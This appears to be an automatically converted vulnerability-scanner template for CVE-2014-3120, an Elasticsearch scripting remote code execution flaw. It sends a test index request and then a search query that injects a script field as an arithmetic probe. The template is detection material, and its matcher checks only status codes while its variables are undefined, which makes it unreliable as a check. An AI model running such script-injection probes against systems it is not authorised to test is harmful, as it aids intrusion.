id: yaml-poc-elastic-elasticsearch-unsafe_config-CVE-2014-3120
info:
  name: Yaml Poc Elastic Elasticsearch Unsafe_Config Cve 2014 3120
  author: converted
  severity: high
  description: 'Converted from xpoc: yaml-poc-elastic-elasticsearch-unsafe_config-CVE-2014-3120'
  tags: elasticsearch,cve
  classification:
    cve-id: CVE-2014-3120
  reference:
  - http://bouk.co/blog/elasticsearch-rce/
  - http://www.exploit-db.com/exploits/33370
  - http://www.osvdb.org/106949
  - http://www.rapid7.com/db/modules/exploit/multi/elasticsearch/script_mvel_rce
  - http://www.securityfocus.com/bid/67731
http:
- method: POST
  path:
  - /test/test1/123
  body: "{\n  \"name\": \"test\"\n}\n"
  headers:
    Content-Type: application/json
  matchers-condition: and
  matchers:
  - type: status
    status:
    - 201
    - 200
- method: POST
  path:
  - /_search
  body: "{\n    \"size\": 1,\n    \"query\": {\n      \"filtered\": {\n        \"\
    query\": {\n          \"match_all\": {\n          }\n        }\n      }\n    },\n\
    \    \"script_fields\": {\n        \"command\": {\n            \"script\": \"\
    {{r}}+{{r1}}\"\n        }\n    }\n}"
  headers:
    Content-Type: application/json
  matchers-condition: and
  matchers:
  - type: status
    status:
    - 200
